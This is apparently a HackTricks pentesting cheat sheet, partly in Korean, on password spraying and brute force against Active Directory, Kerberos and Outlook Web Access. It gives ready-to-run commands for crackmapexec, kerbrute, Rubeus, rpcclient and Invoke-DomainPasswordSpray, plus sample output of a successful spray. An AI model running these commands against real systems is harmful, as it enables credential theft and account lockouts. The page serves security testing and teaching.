Password Spraying / Brute Force

Support HackTricks

Password Spraying

여러 유효한 사용자 이름을 찾은 후, 발견된 각 사용자와 함께 가장 일반적인 비밀번호를 시도할 수 있습니다. 기본적으로 최소 비밀번호 길이7입니다.

일반적인 사용자 이름 목록도 유용할 수 있습니다: https://github.com/insidetrust/statistically-likely-usernames

여러 개의 잘못된 비밀번호를 시도하면 계정이 잠길 수 있습니다(기본적으로 10개 이상).

Get password policy

사용자 자격 증명이나 도메인 사용자로서의 쉘이 있는 경우, 다음 명령어로 비밀번호 정책을 가져올 수 있습니다:

# From Linux
crackmapexec <IP> -u 'user' -p 'password' --pass-pol

enum4linux -u 'username' -p 'password' -P <IP>

rpcclient -U "" -N 10.10.10.10;
rpcclient $>querydominfo

ldapsearch -h 10.10.10.10 -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength

# From Windows
net accounts

(Get-DomainPolicy)."SystemAccess" #From powerview

Exploitation from Linux (or all)

  • Using crackmapexec:

crackmapexec smb <IP> -u users.txt -p passwords.txt
# Local Auth Spray (once you found some local admin pass or hash)
## --local-auth flag indicate to only try 1 time per machine
crackmapexec smb --local-auth 10.10.10.10/23 -u administrator -H 10298e182387f9cab376ecd08491764a0 | grep +
# Password Spraying
./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com [--dc 10.10.10.10] domain_users.txt Password123
# Brute-Force
./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com [--dc 10.10.10.10] passwords.lst thoffman
  • spray (잠금 방지를 위해 시도 횟수를 지정할 수 있습니다):

spray.sh -smb <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <DOMAIN>
  • kerbrute (파이썬) 사용 - 권장하지 않음, 가끔 작동하지 않음

python kerbrute.py -domain jurassic.park -users users.txt -passwords passwords.txt -outputfile jurassic_passwords.txt
python kerbrute.py -domain jurassic.park -users users.txt -password Password123 -outputfile jurassic_passwords.txt
  • scanner/smb/smb_login 모듈을 사용하여 Metasploit:

  • rpcclient 사용:

# https://www.blackhillsinfosec.com/password-spraying-other-fun-with-rpcclient/
for u in $(cat users.txt); do
rpcclient -U "$u%Welcome1" -c "getusername;quit" 10.10.10.10 | grep Authority;
done

From Windows

  • Rubeus의 브루트 모듈이 포함된 버전:

# with a list of users
.\Rubeus.exe brute /users:<users_file> /passwords:<passwords_file> /domain:<domain_name> /outfile:<output_file>

# check passwords for all users in current domain
.\Rubeus.exe brute /passwords:<passwords_file> /outfile:<output_file>
  • Invoke-DomainPasswordSpray를 사용하여 (기본적으로 도메인에서 사용자를 생성할 수 있으며 도메인에서 비밀번호 정책을 가져와 이에 따라 시도를 제한합니다):

Invoke-DomainPasswordSpray -UserList .\users.txt -Password 123456 -Verbose
Invoke-SprayEmptyPassword

무차별 대입 공격

legba kerberos --target 127.0.0.1 --username admin --password wordlists/passwords.txt --kerberos-realm example.org

Outlook Web Access

password spraying outlook를 위한 여러 도구가 있습니다.

이 도구를 사용하려면 사용자 목록과 비밀번호 / 비밀번호의 작은 목록이 필요합니다.

./ruler-linux64 --domain reel2.htb -k brute --users users.txt --passwords passwords.txt --delay 0 --verbose
[x] Failed: larsson:Summer2020
[x] Failed: cube0x0:Summer2020
[x] Failed: a.admin:Summer2020
[x] Failed: c.cube:Summer2020
[+] Success: s.svensson:Summer2020

Google

Okta

References

HackTricks 지원하기

Last updated